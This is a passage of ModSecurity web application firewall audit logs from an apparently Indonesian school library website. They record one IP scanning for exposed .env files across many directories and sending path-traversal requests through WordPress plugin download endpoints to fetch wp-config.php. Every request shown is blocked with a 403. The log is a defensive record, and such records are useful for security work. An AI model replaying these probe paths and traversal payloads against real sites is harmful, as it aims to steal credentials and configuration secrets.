Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274696 --3c9ffe2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3c9ffe2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808674391 725 (- - -) Stopwatch2: 1747172808674391 725; combined=301, p1=265, p2=0, p3=0, p4=0, p5=36, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c9ffe2d-Z-- --f1d13874-A-- [14/May/2025:04:46:48 +0700] aCO9yF1ltXwOneQqchOtcAAAAAI 103.236.140.4 48956 103.236.140.4 8181 --f1d13874-B-- GET /api_v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875081 --f1d13874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f1d13874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172808872787 693 (- - -) Stopwatch2: 1747172808872787 693; combined=253, p1=220, p2=0, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1d13874-Z-- --52294b38-A-- [14/May/2025:04:46:49 +0700] aCO9yTMGvM3GPb0-SyRPKAAAAE8 103.236.140.4 48960 103.236.140.4 8181 --52294b38-B-- GET /api_v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274699 --52294b38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52294b38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172809069532 564 (- - -) Stopwatch2: 1747172809069532 564; combined=191, p1=164, p2=0, p3=0, p4=0, p5=27, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52294b38-Z-- --d2340171-A-- [14/May/2025:04:46:49 +0700] aCO9yV1ltXwOneQqchOtcgAAAAM 103.236.140.4 48964 103.236.140.4 8181 --d2340171-B-- GET /v2/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274702 --d2340171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d2340171-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172809466696 596 (- - -) Stopwatch2: 1747172809466696 596; combined=258, p1=226, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2340171-Z-- --678d8d08-A-- [14/May/2025:04:46:49 +0700] aCO9yV1ltXwOneQqchOtdAAAAAo 103.236.140.4 48970 103.236.140.4 8181 --678d8d08-B-- GET /v1/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274705 --678d8d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --678d8d08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172809865202 766 (- - -) Stopwatch2: 1747172809865202 766; combined=301, p1=270, p2=0, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --678d8d08-Z-- --9be7b12d-A-- [14/May/2025:04:46:50 +0700] aCO9yl1ltXwOneQqchOtdQAAAAw 103.236.140.4 48976 103.236.140.4 8181 --9be7b12d-B-- GET /admin/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875090 --9be7b12d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9be7b12d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810063585 716 (- - -) Stopwatch2: 1747172810063585 716; combined=310, p1=278, p2=0, p3=0, p4=0, p5=32, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9be7b12d-Z-- --40afb74a-A-- [14/May/2025:04:46:50 +0700] aCO9yjMGvM3GPb0-SyRPKQAAAFE 103.236.140.4 48980 103.236.140.4 8181 --40afb74a-B-- GET /laravel/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274708 --40afb74a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --40afb74a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810263902 623 (- - -) Stopwatch2: 1747172810263902 623; combined=196, p1=169, p2=0, p3=0, p4=0, p5=26, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40afb74a-Z-- --36f2fb40-A-- [14/May/2025:04:46:50 +0700] aCO9yl1ltXwOneQqchOtdgAAAA4 103.236.140.4 48984 103.236.140.4 8181 --36f2fb40-B-- GET /ci4/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875093 --36f2fb40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --36f2fb40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810461154 786 (- - -) Stopwatch2: 1747172810461154 786; combined=348, p1=315, p2=0, p3=0, p4=0, p5=33, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f2fb40-Z-- --52c2b043-A-- [14/May/2025:04:46:50 +0700] aCO9yl1ltXwOneQqchOtdwAAABA 103.236.140.4 48988 103.236.140.4 8181 --52c2b043-B-- GET /backup/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274711 --52c2b043-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52c2b043-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810659474 830 (- - -) Stopwatch2: 1747172810659474 830; combined=289, p1=257, p2=0, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52c2b043-Z-- --2a36e760-A-- [14/May/2025:04:46:50 +0700] aCO9yjMGvM3GPb0-SyRPKgAAAFM 103.236.140.4 48992 103.236.140.4 8181 --2a36e760-B-- GET /frontend/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875096 --2a36e760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2a36e760-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172810856597 693 (- - -) Stopwatch2: 1747172810856597 693; combined=265, p1=231, p2=0, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a36e760-Z-- --7a10d803-A-- [14/May/2025:04:46:51 +0700] aCO9y11ltXwOneQqchOteAAAABI 103.236.140.4 48996 103.236.140.4 8181 --7a10d803-B-- GET /old/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274714 --7a10d803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7a10d803-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172811055323 680 (- - -) Stopwatch2: 1747172811055323 680; combined=252, p1=219, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a10d803-Z-- --1e73c978-A-- [14/May/2025:04:46:51 +0700] aCO9y11ltXwOneQqchOteQAAABQ 103.236.140.4 49000 103.236.140.4 8181 --1e73c978-B-- GET /dev/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875099 --1e73c978-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1e73c978-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172811253078 680 (- - -) Stopwatch2: 1747172811253078 680; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e73c978-Z-- --3d43944f-A-- [14/May/2025:04:46:51 +0700] aCO9y11ltXwOneQqchOtegAAABY 103.236.140.4 49004 103.236.140.4 8181 --3d43944f-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274717 --3d43944f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3d43944f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172811450101 695 (- - -) Stopwatch2: 1747172811450101 695; combined=266, p1=234, p2=0, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d43944f-Z-- --751c4c0f-A-- [14/May/2025:04:46:51 +0700] aCO9y8OlTOX2TmGW6__uqgAAANU 103.236.140.4 49008 103.236.140.4 8181 --751c4c0f-B-- GET /public/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875102 --751c4c0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --751c4c0f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172811647423 702 (- - -) Stopwatch2: 1747172811647423 702; combined=278, p1=246, p2=0, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --751c4c0f-Z-- --cc3e1b0b-A-- [14/May/2025:04:46:57 +0700] aCO90TMGvM3GPb0-SyRPRwAAAFg 103.236.140.4 49012 103.236.140.4 8181 --cc3e1b0b-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274762 --cc3e1b0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cc3e1b0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172817448102 648 (- - -) Stopwatch2: 1747172817448102 648; combined=298, p1=267, p2=0, p3=0, p4=0, p5=31, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc3e1b0b-Z-- --f3c1df38-A-- [14/May/2025:04:46:57 +0700] aCO90TMGvM3GPb0-SyRPSAAAAEI 103.236.140.4 49072 103.236.140.4 8181 --f3c1df38-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146875147 --f3c1df38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f3c1df38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172817645508 712 (- - -) Stopwatch2: 1747172817645508 712; combined=280, p1=247, p2=0, p3=0, p4=0, p5=32, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3c1df38-Z-- --e2bbdf23-A-- [14/May/2025:04:46:57 +0700] aCO90cOlTOX2TmGW6__uqwAAANg 103.236.140.4 49076 103.236.140.4 8181 --e2bbdf23-B-- GET /force-download.php?file=wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147274765 --e2bbdf23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e2bbdf23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747172817843495 862 (- - -) Stopwatch2: 1747172817843495 862; combined=350, p1=319, p2=0, p3=0, p4=0, p5=31, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 